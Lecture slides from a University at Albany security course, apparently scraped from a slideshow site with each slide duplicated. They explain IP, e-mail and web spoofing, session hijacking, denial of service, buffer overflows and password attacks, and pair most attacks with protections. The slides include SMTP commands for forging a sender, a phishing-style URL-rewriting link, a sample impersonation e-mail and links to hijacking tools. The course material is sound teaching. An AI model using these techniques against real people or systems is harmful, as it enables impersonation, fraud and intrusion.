Attacker spoofs the address of another machine and
inserts itself between the attacked machine and the
spoofed machine to intercept replies
IP Spoofing –Source Routing
Replies sent back
to 10.10.20.30
Spoofed Address
10.10.20.30
Attacker
10.10.50.50
John
10.10.5.5
From Address: 10.10.20.30
To Address: 10.10.5.5
•The path a packet may change can vary over time
Attacker intercepts packets
as they go to 10.10.20.30
Sanjay Goel, School of Business, University at Albany
32
•Attacker uses source routing to ensure that the packets pass
through certain nodes on the network
–Loose Source Routing (LSR): The sender specifies a list of
addresses that the packet must go through but it can go to any
other address if it needs to.
–Strict Source Routing (SSR): The sender specifies the exact path
for the packet and the packet is dropped if the exact path can
not be taken.
•Source Routing works by using a 39-byte source route
option field in the IP header
–Works by picking one node address at a time sequentially
–A maximum of 9 nodes in the path can be specified
•Source Routing was introduced into the TCP spec for
debugging and testing redundancy in the network
IP Spoofing –Source Routing
Contd.
32
•Attacker uses source routing to ensure that the packets pass
through certain nodes on the network
–Loose Source Routing (LSR): The sender specifies a list of
addresses that the packet must go through but it can go to any
other address if it needs to.
–Strict Source Routing (SSR): The sender specifies the exact path
for the packet and the packet is dropped if the exact path can
not be taken.
•Source Routing works by using a 39-byte source route
option field in the IP header
–Works by picking one node address at a time sequentially
–A maximum of 9 nodes in the path can be specified
•Source Routing was introduced into the TCP spec for
debugging and testing redundancy in the network
IP Spoofing –Source Routing
Contd.
Sanjay Goel, School of Business, University at Albany
33
•Tracert: Windows NT utility runs at a Command prompt.
•Traces a path from your machine to the URL or IP address given along
with the tracert command.
•Usage:
–tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
–Options:
•-d Do not resolve addresses to hostnames.
•-h maximum_hops Maximum number of hops to search for target.
•-j host-list Loose source route along host-list.
•-w timeout Wait timeout milliseconds for each reply.
•Tracing a URL: tracert www.techadvice.com <enter>
– Tracing route to www.techadvice.com [63.69.55.237]
over a maximum of 30 hops:
1 181 ms 160 ms 170 ms border0.Srvf.Rx2.abc [63.69.55.237]
2 170 ms 170 ms 160 ms 192.168.0.2
3 .....
IP Spoofing –Source Routing
contd.
33
•Tracert: Windows NT utility runs at a Command prompt.
•Traces a path from your machine to the URL or IP address given along
with the tracert command.
•Usage:
–tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
–Options:
•-d Do not resolve addresses to hostnames.
•-h maximum_hops Maximum number of hops to search for target.
•-j host-list Loose source route along host-list.
•-w timeout Wait timeout milliseconds for each reply.
•Tracing a URL: tracert www.techadvice.com <enter>
– Tracing route to www.techadvice.com [63.69.55.237]
over a maximum of 30 hops:
1 181 ms 160 ms 170 ms border0.Srvf.Rx2.abc [63.69.55.237]
2 170 ms 170 ms 160 ms 192.168.0.2
3 .....
IP Spoofing –Source Routing
contd.
Sanjay Goel, School of Business, University at Albany
34
•Tracing an IP-Address: tracert 3.1.6.62
•Tracing using loose source routing: tracert –j 3.2.1.44
3.3.1.42
•Protection
–Disable source routing at your routers
IP Spoofing –Source Routing
contd.
34
•Tracing an IP-Address: tracert 3.1.6.62
•Tracing using loose source routing: tracert –j 3.2.1.44
3.3.1.42
•Protection
–Disable source routing at your routers
IP Spoofing –Source Routing
contd.
Sanjay Goel, School of Business, University at Albany
35
•In UNIX trust relationships can be set up between multiple machines
–After trust becomes established the user can use Unix r commands to
access sources on different machines
–A .rhosts file is set up on individual machines or /etc/hosts.equiv is
used to set it up at the system level
•Trust relationship is easy to spoof
–If user realizes that a machine trusts the IP address 10.10.10.5 he can
spoof that address and he is allowed access without password
–The responses go back to the spoofed machine so this is still a flying
blind attack.
•Protection
–Do not use trust relations
–Do not allow trust relationships on the internet and limit them within
the company
–Monitor which machines and users can have trust without jeopardizing
critical data or function
IP Spoofing –Trust Relationships
35
•In UNIX trust relationships can be set up between multiple machines
–After trust becomes established the user can use Unix r commands to
access sources on different machines
–A .rhosts file is set up on individual machines or /etc/hosts.equiv is
used to set it up at the system level
•Trust relationship is easy to spoof
–If user realizes that a machine trusts the IP address 10.10.10.5 he can
spoof that address and he is allowed access without password
–The responses go back to the spoofed machine so this is still a flying
blind attack.
•Protection
–Do not use trust relations
–Do not allow trust relationships on the internet and limit them within
the company
–Monitor which machines and users can have trust without jeopardizing
critical data or function
IP Spoofing –Trust Relationships
Sanjay Goel, School of Business, University at Albany
36
Definition:
Attacker sends messages masquerading as some one else
What can be the repercussions?
Reasons:
•Attackers want to hide their identity while
sending messages (sending anonymous emails)
–User sends email to anonymous e-mailer which sends
emails to the intended recipient
•Attacker wants to impersonate someone
–To get someone in trouble
•Social engineering
–Get information by pretending to be someone else
Email Spoofing
36
Definition:
Attacker sends messages masquerading as some one else
What can be the repercussions?
Reasons:
•Attackers want to hide their identity while
sending messages (sending anonymous emails)
–User sends email to anonymous e-mailer which sends
emails to the intended recipient
•Attacker wants to impersonate someone
–To get someone in trouble
•Social engineering
–Get information by pretending to be someone else
Email Spoofing
Sanjay Goel, School of Business, University at Albany
37
•Create an account with similar email
address
–[email protected]: A message from this
account can perplex the students
–Most mailers have an alias field (this can be
used to prescribe any name.
•Example
Class:
I am too sick to come to the class tomorrow so the class is cancelled.
The assignments that were due are now due next week.
Sanjay Goel
Email Spoofing –Similar Name
Account
37
•Create an account with similar email
address
–[email protected]: A message from this
account can perplex the students
–Most mailers have an alias field (this can be
used to prescribe any name.
•Example
Class:
I am too sick to come to the class tomorrow so the class is cancelled.
The assignments that were due are now due next week.
Sanjay Goel
Email Spoofing –Similar Name
Account
Sanjay Goel, School of Business, University at Albany
38
•Protection
–Educating the employees in a corporation to be
cautious
–Make sure that the full email address rather than alias
is displayed
–Institute policy that all official communication be
done using company email
–Use PKI where digital signature of each employee is
associated with the email
Email Spoofing –Similar Name
Account
38
•Protection
–Educating the employees in a corporation to be
cautious
–Make sure that the full email address rather than alias
is displayed
–Institute policy that all official communication be
done using company email
–Use PKI where digital signature of each employee is
associated with the email
Email Spoofing –Similar Name
Account
Sanjay Goel, School of Business, University at Albany
39
•Modify a mail client
–When email is sent from the user no
authentication is performed on the from
address
–Attacker can put in any return address he
wants to in the mail he sends
•Protection
–Education
–Audit Logging
–Looking at the full email address
Email Spoofing –Mail
Client
39
•Modify a mail client
–When email is sent from the user no
authentication is performed on the from
address
–Attacker can put in any return address he
wants to in the mail he sends
•Protection
–Education
–Audit Logging
–Looking at the full email address
Email Spoofing –Mail
Client
Sanjay Goel, School of Business, University at Albany
40
•Telnet to port 25
–Most mail servers use port 25 for SMTP.
–An attacker runs a port scan and gets the IP address
of machine with port 25 open
–telnet ip-adress 25 (cmd to telnet to port 25)
–Attacker logs on to this port and composes a message
for the user.
•Example:
Hello
mail from:spoofed-email-address
Rcpt to: person-sending-mail-to
Data (message you want to send)
Period sign at the end of the message
Email Spoofing –Telnet to Port 25
40
•Telnet to port 25
–Most mail servers use port 25 for SMTP.
–An attacker runs a port scan and gets the IP address
of machine with port 25 open
–telnet ip-adress 25 (cmd to telnet to port 25)
–Attacker logs on to this port and composes a message
for the user.
•Example:
Hello
mail from:spoofed-email-address
Rcpt to: person-sending-mail-to
Data (message you want to send)
Period sign at the end of the message
Email Spoofing –Telnet to Port 25
Sanjay Goel, School of Business, University at Albany
41
•Mail relaying is the sending of email to a
person on a different domain
•Protection
–Make sure that the recipients domain is the
same as the the mail server
–New SMTP servers disallow mail relaying
–From a remote connection the from and to
addresses are from the same domain as the
mail server
–Make sure that spoofing and relay filters are
configured
Email Spoofing –Telnet to Port 25
41
•Mail relaying is the sending of email to a
person on a different domain
•Protection
–Make sure that the recipients domain is the
same as the the mail server
–New SMTP servers disallow mail relaying
–From a remote connection the from and to
addresses are from the same domain as the
mail server
–Make sure that spoofing and relay filters are
configured
Email Spoofing –Telnet to Port 25
Sanjay Goel, School of Business, University at Albany
42
•Basic
•Man-in-the-Middle Attack
•URL Rewriting
•Tracking State
Web Spoofing
42
•Basic
•Man-in-the-Middle Attack
•URL Rewriting
•Tracking State
Web Spoofing
Sanjay Goel, School of Business, University at Albany
43
•No requirement against registering a domain
–Attacker registers a web address matching an entity
e.g. votebush.com, geproducts.com, gesucks.com
•Process
–Hacker sets up a spoofed site
–User goes to the spoofed site
–Clicks on items to order and checks out
–Site prompts user for credit card information
–Gives the user a cookie
–Puts message –Site experiencing technical difficulty
–When user tries back spoofed site checks cookie
–Already has credit card number so directs the user to
legitimate site
Web Spoofing -Basic
43
•No requirement against registering a domain
–Attacker registers a web address matching an entity
e.g. votebush.com, geproducts.com, gesucks.com
•Process
–Hacker sets up a spoofed site
–User goes to the spoofed site
–Clicks on items to order and checks out
–Site prompts user for credit card information
–Gives the user a cookie
–Puts message –Site experiencing technical difficulty
–When user tries back spoofed site checks cookie
–Already has credit card number so directs the user to
legitimate site
Web Spoofing -Basic
Sanjay Goel, School of Business, University at Albany
44
•Protection
–Use server side certificates
–Certificates much harder to spoof
–Users need to ensure that the certificates are
legitimate before clicking on OK to accept certificate
Web Spoofing -Basic
44
•Protection
–Use server side certificates
–Certificates much harder to spoof
–Users need to ensure that the certificates are
legitimate before clicking on OK to accept certificate
Web Spoofing -Basic
Sanjay Goel, School of Business, University at Albany
45
•Man-in-the-Middle Attack
–Attacker acts as a proxy between the web server and
the client
–Attacker has to compromise the router or a node
through which the relevant traffic flows
•Protection
–Secure the perimeter to prevent compromise of
routers
Web Spoofing –Man in the Middle
Attack
45
•Man-in-the-Middle Attack
–Attacker acts as a proxy between the web server and
the client
–Attacker has to compromise the router or a node
through which the relevant traffic flows
•Protection
–Secure the perimeter to prevent compromise of
routers
Web Spoofing –Man in the Middle
Attack
Sanjay Goel, School of Business, University at Albany
46
•URL Rewriting
–Attacker redirects web traffic to another site that is
controlled by the attacker
–Attacker writes his own web site address before the
legitimate link
– e.g. <A href=“http://www.hacker.com/http://www.albany.edu/index.html”>
–The user is first directed to the hacker site and then
redirected to the actual site
•Protections
–Web browsers should be configured to always show
complete address
–Ensure that the code for the web sites is properly
protected at the server end and during transit
Web Spoofing –URL Rewriting
46
•URL Rewriting
–Attacker redirects web traffic to another site that is
controlled by the attacker
–Attacker writes his own web site address before the
legitimate link
– e.g. <A href=“http://www.hacker.com/http://www.albany.edu/index.html”>
–The user is first directed to the hacker site and then
redirected to the actual site
•Protections
–Web browsers should be configured to always show
complete address
–Ensure that the code for the web sites is properly
protected at the server end and during transit
Web Spoofing –URL Rewriting
Sanjay Goel, School of Business, University at Albany
47
•Tracking State
–When a user logs on to a site a persistent
authentication is maintained
–This authentication can be stolen for masquerading as
the user
Web Spoofing
47
•Tracking State
–When a user logs on to a site a persistent
authentication is maintained
–This authentication can be stolen for masquerading as
the user
Web Spoofing
Sanjay Goel, School of Business, University at Albany
48
•Browsers primarily use Http protocol to
communicate
–Http is a stateless protocol
–Web Sites need to maintain persistent authentication
so that user does not have to authenticate
repeatedly
–This authentication can be stolen for masquerading
as the user
Tracking State
Web Server DatabaseBrowser
Request
Response
48
•Browsers primarily use Http protocol to
communicate
–Http is a stateless protocol
–Web Sites need to maintain persistent authentication
so that user does not have to authenticate
repeatedly
–This authentication can be stolen for masquerading
as the user
Tracking State
Web Server DatabaseBrowser
Request
Response
Sanjay Goel, School of Business, University at Albany
49
•Three types of tracking methods are used:
1.Cookies: Line of text with ID on the users
cookie file
–Attacker can read the ID from users cookie file
2.URL Session Tracking: An id is appended to all
the links in the website web pages.
–Attacker can guess or read this id and masquerade
as user
3.Hidden Form Elements
–ID is hidden in form elements which are not visible
to user
–Hacker can modify these to masquerade as another
user
Web Spoofing –Tracking
State
49
•Three types of tracking methods are used:
1.Cookies: Line of text with ID on the users
cookie file
–Attacker can read the ID from users cookie file
2.URL Session Tracking: An id is appended to all
the links in the website web pages.
–Attacker can guess or read this id and masquerade
as user
3.Hidden Form Elements
–ID is hidden in form elements which are not visible
to user
–Hacker can modify these to masquerade as another
user
Web Spoofing –Tracking
State
Sanjay Goel, School of Business, University at Albany
50
•Cookies are a piece of information that the server
passes to the browser and the browser stores on
the server
–Set of name value pairs
•Web servers place cookies on user machines with
id to track the users
•Two types of cookies
–Persistent cookies: Stored on hard drive in text format
–Non-persistent cookies: Stored in memory and goes
away after you reboot or turn off the machine
•Attacker gets cookies by:
–Accessing the victim hard drive
–Guessing Ids which different web servers assign
Web Spoofing –Tracking State
Cookies
50
•Cookies are a piece of information that the server
passes to the browser and the browser stores on
the server
–Set of name value pairs
•Web servers place cookies on user machines with
id to track the users
•Two types of cookies
–Persistent cookies: Stored on hard drive in text format
–Non-persistent cookies: Stored in memory and goes
away after you reboot or turn off the machine
•Attacker gets cookies by:
–Accessing the victim hard drive
–Guessing Ids which different web servers assign
Web Spoofing –Tracking State
Cookies
Sanjay Goel, School of Business, University at Albany
51
•Protection
–Physical protection of hard drives is best
protection
–Use non-persistent cookies since hacker has
to access and edit memory to get to it.
–Use random, hard to guess ID
Web Spoofing –Tracking State
Cookies
51
•Protection
–Physical protection of hard drives is best
protection
–Use non-persistent cookies since hacker has
to access and edit memory to get to it.
–Use random, hard to guess ID
Web Spoofing –Tracking State
Cookies
Sanjay Goel, School of Business, University at Albany
52
•http:// www.address.edu:1234/path/subdir/file.ext?query_string
–Service http
–Host www. Address. edu
–Port 1234
–/path/subdur/file.ext resource path on the server
– query_string additional information that can be passed to resource
•Http allows name value pairs to be passed to the resource
–http://www. test. edu/index.jsp?firstname=sanjay+lastname=goel
•The server can place the id of a customer along with the URL
–http://www.fake.com/ordering/id=928932888329938.823948
•This number can be obtained by guessing or looking over some one’s
shoulder
–Timeout for the sessions may be a few hours
–User can masquerade as the owner of the id and transact on the web
Web Spoofing –Tracking State URL
Encoding
52
•http:// www.address.edu:1234/path/subdir/file.ext?query_string
–Service http
–Host www. Address. edu
–Port 1234
–/path/subdur/file.ext resource path on the server
– query_string additional information that can be passed to resource
•Http allows name value pairs to be passed to the resource
–http://www. test. edu/index.jsp?firstname=sanjay+lastname=goel
•The server can place the id of a customer along with the URL
–http://www.fake.com/ordering/id=928932888329938.823948
•This number can be obtained by guessing or looking over some one’s
shoulder
–Timeout for the sessions may be a few hours
–User can masquerade as the owner of the id and transact on the web
Web Spoofing –Tracking State URL
Encoding
Sanjay Goel, School of Business, University at Albany
53
•Server Side
–Use large, hard to guess identifiers
–Keep the session inactivity time low
•User Side
–Make sure that no one is looking over your shoulder
as you browse
–Do not leave terminals unattended
•Use server side certificates
–A server side certificate is a certificate that the
server presents to a client to prove identity
–Users should verify the certificates prior to clicking
OK on the accept button
Web Spoofing –URL Encoding
Protection
53
•Server Side
–Use large, hard to guess identifiers
–Keep the session inactivity time low
•User Side
–Make sure that no one is looking over your shoulder
as you browse
–Do not leave terminals unattended
•Use server side certificates
–A server side certificate is a certificate that the
server presents to a client to prove identity
–Users should verify the certificates prior to clicking
OK on the accept button
Web Spoofing –URL Encoding
Protection
Sanjay Goel, School of Business, University at Albany
54
•HTML allows creation of hidden fields in the
forms
•Developers exploit this to store information for
their reference
•ID can be stored as a hidden form field
–<Input Type=Hidden Name=“Search” Value=“key”>
–<Input Type=Hidden Name=“id” Value=“123429823”>
•Protection
–Hard to guess ids
–Short expiry times
Web Spoofing –Tracking State
Cookies
54
•HTML allows creation of hidden fields in the
forms
•Developers exploit this to store information for
their reference
•ID can be stored as a hidden form field
–<Input Type=Hidden Name=“Search” Value=“key”>
–<Input Type=Hidden Name=“id” Value=“123429823”>
•Protection
–Hard to guess ids
–Short expiry times
Web Spoofing –Tracking State
Cookies
Sanjay Goel, School of Business, University at Albany
55
•Disable JavaScript, ActiveX and other scripting
languages that execute locally or in the browser
•Make sure that the browsers location line is
always visible
•Educate the users
•Make hard to guess session ids
•Use server side certificates
–A server side certificate is a certificate that the
server presents to a client to prove identity
–Users should verify the certificates prior to clicking
OK on the accept button
Web Spoofing –General Protection
55
•Disable JavaScript, ActiveX and other scripting
languages that execute locally or in the browser
•Make sure that the browsers location line is
always visible
•Educate the users
•Make hard to guess session ids
•Use server side certificates
–A server side certificate is a certificate that the
server presents to a client to prove identity
–Users should verify the certificates prior to clicking
OK on the accept button
Web Spoofing –General Protection
Sanjay Goel, School of Business, University at Albany
56
Definition:
Process of taking over an existing active session
Modus Operandi:
1.User makes a connection to the server by
authenticating using his user ID and password.
2.After the users authenticate, they have access to the
server as long as the session lasts.
3.Hacker takes the user offline by denial of service
4.Hacker gains access to the user by impersonating the
user
Session Hijacking
56
Definition:
Process of taking over an existing active session
Modus Operandi:
1.User makes a connection to the server by
authenticating using his user ID and password.
2.After the users authenticate, they have access to the
server as long as the session lasts.
3.Hacker takes the user offline by denial of service
4.Hacker gains access to the user by impersonating the
user
Session Hijacking
Sanjay Goel, School of Business, University at Albany
57
•Attacker can
–monitor the session
–periodically inject commands into session
–launch passive and active attacks from the session
Session Hijacking
Bob telnets to Server
Bob authenticates to Server
Bob
Attacker
Server
Die! Hi! I am Bob
57
•Attacker can
–monitor the session
–periodically inject commands into session
–launch passive and active attacks from the session
Session Hijacking
Bob telnets to Server
Bob authenticates to Server
Bob
Attacker
Server
Die! Hi! I am Bob
Sanjay Goel, School of Business, University at Albany
58
•Attackers exploit sequence numbers to hijack sessions
•Sequence numbers are 32-bit counters used to:
–tell receiving machines the correct order of packets
–Tell sender which packets are received and which are lost
•Receiver and Sender have their own sequence numbers
•When two parties communicate the following are
needed:
–IP addresses
–Port Numbers
–Sequence Number
•IP addresses and port numbers are easily available so
once the attacker gets the server to accept his guessed
sequence numbers he can hijack the session.
Session Hijacking –How Does it
Work?
58
•Attackers exploit sequence numbers to hijack sessions
•Sequence numbers are 32-bit counters used to:
–tell receiving machines the correct order of packets
–Tell sender which packets are received and which are lost
•Receiver and Sender have their own sequence numbers
•When two parties communicate the following are
needed:
–IP addresses
–Port Numbers
–Sequence Number
•IP addresses and port numbers are easily available so
once the attacker gets the server to accept his guessed
sequence numbers he can hijack the session.
Session Hijacking –How Does it
Work?
Sanjay Goel, School of Business, University at Albany
59
•Juggernaut
–Network sniffer that that can also be used for hijacking
–Get from http://packetstorm.securify.com
•Hunt
–Can be use to listen, intercept and hijack active sessions on a
network
–http://lin.fsid.cvut.cz/~kra/index.html
•TTY Watcher
–Freeware program to monitor and hijack sessions on a single host
–http://www.cerias.purdue.edu
•IP Watcher
–Commercial session hijacking tool based on TTY Watcher
–http://www.engrade.com
Session Hijacking –Programs
59
•Juggernaut
–Network sniffer that that can also be used for hijacking
–Get from http://packetstorm.securify.com
•Hunt
–Can be use to listen, intercept and hijack active sessions on a
network
–http://lin.fsid.cvut.cz/~kra/index.html
•TTY Watcher
–Freeware program to monitor and hijack sessions on a single host
–http://www.cerias.purdue.edu
•IP Watcher
–Commercial session hijacking tool based on TTY Watcher
–http://www.engrade.com
Session Hijacking –Programs
Sanjay Goel, School of Business, University at Albany
60
•Use Encryption
–Prevents hacker from intercepting packets
•Use a secure protocol for sensitive work
–E.g. administering remote machines
•Limit incoming connections
•Minimize remote access
•Strong authentication ineffective
–Since the authentication is only done at beginning of
the session
Session Hijacking –Protection
60
•Use Encryption
–Prevents hacker from intercepting packets
•Use a secure protocol for sensitive work
–E.g. administering remote machines
•Limit incoming connections
•Minimize remote access
•Strong authentication ineffective
–Since the authentication is only done at beginning of
the session
Session Hijacking –Protection
Sanjay Goel, School of Business, University at Albany
61
Definition:
Attack through which a person can render a system unusable or
significantly slow down the system for legitimate users by
overloading the system so that no one else can use it.
Types:
1.Crashing the system or network
–Send the victim data or packets which will cause system to crash or
reboot.
2.Exhausting the resources by flooding the system or network with
information
–Since all resources are exhausted others are denied access to the
resources
3.Distributed DOS attacks are coordinated denial of service attacks
involving several people and/or machines to launch attacks
Denial of Service (DOS)
Attack
61
Definition:
Attack through which a person can render a system unusable or
significantly slow down the system for legitimate users by
overloading the system so that no one else can use it.
Types:
1.Crashing the system or network
–Send the victim data or packets which will cause system to crash or
reboot.
2.Exhausting the resources by flooding the system or network with
information
–Since all resources are exhausted others are denied access to the
resources
3.Distributed DOS attacks are coordinated denial of service attacks
involving several people and/or machines to launch attacks
Denial of Service (DOS)
Attack
Sanjay Goel, School of Business, University at Albany
62
Types:
1.Ping of Death
2.SSPing
3.Land
4.Smurf
5.SYN Flood
6.CPU Hog
7.Win Nuke
8.RPC Locator
9.Jolt2
10.Bubonic
11.Microsoft Incomplete TCP/IP Packet Vulnerability
12.HP Openview Node Manager SNMP DOS Vulnerability
13.Netscreen Firewall DOS Vulnerability
14.Checkpoint Firewall DOS Vulnerability
Denial of Service (DOS)
Attack
62
Types:
1.Ping of Death
2.SSPing
3.Land
4.Smurf
5.SYN Flood
6.CPU Hog
7.Win Nuke
8.RPC Locator
9.Jolt2
10.Bubonic
11.Microsoft Incomplete TCP/IP Packet Vulnerability
12.HP Openview Node Manager SNMP DOS Vulnerability
13.Netscreen Firewall DOS Vulnerability
14.Checkpoint Firewall DOS Vulnerability
Denial of Service (DOS)
Attack
Sanjay Goel, School of Business, University at Albany
63
•Effective robust design
–Create redundant servers
–Distribute your servers across different ISPs
•Bandwidth limitations
–Limit available band width based on protocol
•Keep systems patched
–Prevents attacks where machines are crashed
•Run the least amount of services
–Limits the options of the hacker
•Allow only necessary traffic
–Prevents hacked machines to be used as launching pads
•Block IP addresses
–Once under attack start blocking IP-addresses at the firewall
DOS Attack -Protection
63
•Effective robust design
–Create redundant servers
–Distribute your servers across different ISPs
•Bandwidth limitations
–Limit available band width based on protocol
•Keep systems patched
–Prevents attacks where machines are crashed
•Run the least amount of services
–Limits the options of the hacker
•Allow only necessary traffic
–Prevents hacked machines to be used as launching pads
•Block IP addresses
–Once under attack start blocking IP-addresses at the firewall
DOS Attack -Protection
Sanjay Goel, School of Business, University at Albany
64
•This attack takes advantage of the way in which
information is stored by computer programs
•An attacker tries to store more information on the stack
than the size of the buffer
How does it work?
Buffer Overflow Attacks
•
Buffer 2
Local Variable 2
Buffer 1
Local Variable 1
Return Pointer
Function Call
Arguments
•
Fill
Direction
Bottom of
Memory
Top of
Memory
Normal Stack
•
Buffer 2
Local Variable 2
Machine Code:
execve(/bin/sh)
New Pointer to
Exec Code
Function Call
Arguments
•
Fill
Direction
Bottom of
Memory
Top of
Memory
Smashed Stack
Return Pointer Overwritten
Buffer 1 Space Overwritten
64
•This attack takes advantage of the way in which
information is stored by computer programs
•An attacker tries to store more information on the stack
than the size of the buffer
How does it work?
Buffer Overflow Attacks
•
Buffer 2
Local Variable 2
Buffer 1
Local Variable 1
Return Pointer
Function Call
Arguments
•
Fill
Direction
Bottom of
Memory
Top of
Memory
Normal Stack
•
Buffer 2
Local Variable 2
Machine Code:
execve(/bin/sh)
New Pointer to
Exec Code
Function Call
Arguments
•
Fill
Direction
Bottom of
Memory
Top of
Memory
Smashed Stack
Return Pointer Overwritten
Buffer 1 Space Overwritten
Sanjay Goel, School of Business, University at Albany
65
•Programs which do not have a rigorous memory check in
the code, are vulnerable to this attack
•Simple weaknesses can be exploited
–If memory allocated for name is 50 characters, someone can
break the system by sending a fictitious name of more than 50
characters
•Can be used for espionage, denial of service or
compromising the integrity of the data
Examples
–NetMeeting Buffer Overflow
–Outlook Buffer Overflow
–AOL Instant Messenger Buffer Overflow
–SQL Server 2000 Extended Stored Procedure Buffer Overflow
Buffer Overflow Attacks
65
•Programs which do not have a rigorous memory check in
the code, are vulnerable to this attack
•Simple weaknesses can be exploited
–If memory allocated for name is 50 characters, someone can
break the system by sending a fictitious name of more than 50
characters
•Can be used for espionage, denial of service or
compromising the integrity of the data
Examples
–NetMeeting Buffer Overflow
–Outlook Buffer Overflow
–AOL Instant Messenger Buffer Overflow
–SQL Server 2000 Extended Stored Procedure Buffer Overflow
Buffer Overflow Attacks
Sanjay Goel, School of Business, University at Albany
66
•Close port or service
–Remove vulnerable software
–Remove software no longer being used
•Apply vendor patch
–Update patches as soon as the vendor releases it
•Filter specific traffic at the firewall
–Once application is identified stop all requests to it
•Test Key Applications
–Test software for vulnerabilities
•Run software in the least privilege required
–Limits the exploitation capacity of the hacker
Buffer Overflow Attacks -
Prevention
66
•Close port or service
–Remove vulnerable software
–Remove software no longer being used
•Apply vendor patch
–Update patches as soon as the vendor releases it
•Filter specific traffic at the firewall
–Once application is identified stop all requests to it
•Test Key Applications
–Test software for vulnerabilities
•Run software in the least privilege required
–Limits the exploitation capacity of the hacker
Buffer Overflow Attacks -
Prevention
Sanjay Goel, School of Business, University at Albany
67
•A hacker can exploit a weak passwords & uncontrolled
network modems easily
•Steps
–Hacker gets the phone number of a company
–Hacker runs war dialer program
•If original number is 555-5532 he runs all numbers in the 555-55xx
range
•When modem answers he records the phone number of modem
–Hacker now needs a user id and password to enter company
network
•Companies often have default accounts e.g. temp, anonymous with no
password
•Often the root account uses company name as the password
•For strong passwords password cracking techniques exist
Password Attacks
67
•A hacker can exploit a weak passwords & uncontrolled
network modems easily
•Steps
–Hacker gets the phone number of a company
–Hacker runs war dialer program
•If original number is 555-5532 he runs all numbers in the 555-55xx
range
•When modem answers he records the phone number of modem
–Hacker now needs a user id and password to enter company
network
•Companies often have default accounts e.g. temp, anonymous with no
password
•Often the root account uses company name as the password
•For strong passwords password cracking techniques exist
Password Attacks
Sanjay Goel, School of Business, University at Albany
68
•Password hashed and stored
–Salt is added to randomize the password and then stored on
the system
•Password attacks launched to crack encrypted password
Password Security
Hash
Function
Hashed
Password
Salt
Compare
Password
Client
Password
Server
Stored Password
Hashed
Password
Allow/Deny Access
68
•Password hashed and stored
–Salt is added to randomize the password and then stored on
the system
•Password attacks launched to crack encrypted password
Password Security
Hash
Function
Hashed
Password
Salt
Compare
Password
Client
Password
Server
Stored Password
Hashed
Password
Allow/Deny Access
Sanjay Goel, School of Business, University at Albany
69
•Find a valid user ID
•Create a list of possible passwords
•Rank the passwords from high probability to low
•Type in each password
•If the system allows you in –success !
•If not, try again, being careful not to exceed password
lockout (the number of times you can guess a wrong
password before the system shuts down and won’t let
you try any more)
Password Attacks -Process
69
•Find a valid user ID
•Create a list of possible passwords
•Rank the passwords from high probability to low
•Type in each password
•If the system allows you in –success !
•If not, try again, being careful not to exceed password
lockout (the number of times you can guess a wrong
password before the system shuts down and won’t let
you try any more)
Password Attacks -Process
Sanjay Goel, School of Business, University at Albany
70
•Dictionary Attack
–Hacker tries all words in dictionary to crack password
–70% of the people use dictionary words as passwords
•Brute Force Attack
–Try all permutations of the letters & symbols in the alphabet
•Hybrid Attack
–Words from dictionary and their variations used in attack
•Social Engineering
–People write passwords in different places
–People disclose passwords naively to others
•Shoulder Surfing
–Hackers slyly watch over peoples shoulders to steal passwords
•Dumpster Diving
–People dump their trash papers in garbage which may contain
information to crack passwords
Password Attacks -Types
70
•Dictionary Attack
–Hacker tries all words in dictionary to crack password
–70% of the people use dictionary words as passwords
•Brute Force Attack
–Try all permutations of the letters & symbols in the alphabet
•Hybrid Attack
–Words from dictionary and their variations used in attack
•Social Engineering
–People write passwords in different places
–People disclose passwords naively to others
•Shoulder Surfing
–Hackers slyly watch over peoples shoulders to steal passwords
•Dumpster Diving
–People dump their trash papers in garbage which may contain
information to crack passwords
Password Attacks -Types
Sanjay Goel, School of Business, University at Albany
71
•Computer Security is a continuous battle
–As computer security gets tighter hackers are getting smarter
•Very high stakes
–Billions of dollars worth of business conducted on the
internet
Conclusions
71
•Computer Security is a continuous battle
–As computer security gets tighter hackers are getting smarter
•Very high stakes
–Billions of dollars worth of business conducted on the
internet
Conclusions
Tags
Categories
GeneralDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 12
- Slides 71
- Age 579 days
Related Slideshows
22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
30 views
26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
32 views
31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
30 views
14
Fertility awareness methods for women in the society
Isaiah47
29 views
35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
26 views
5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
28 views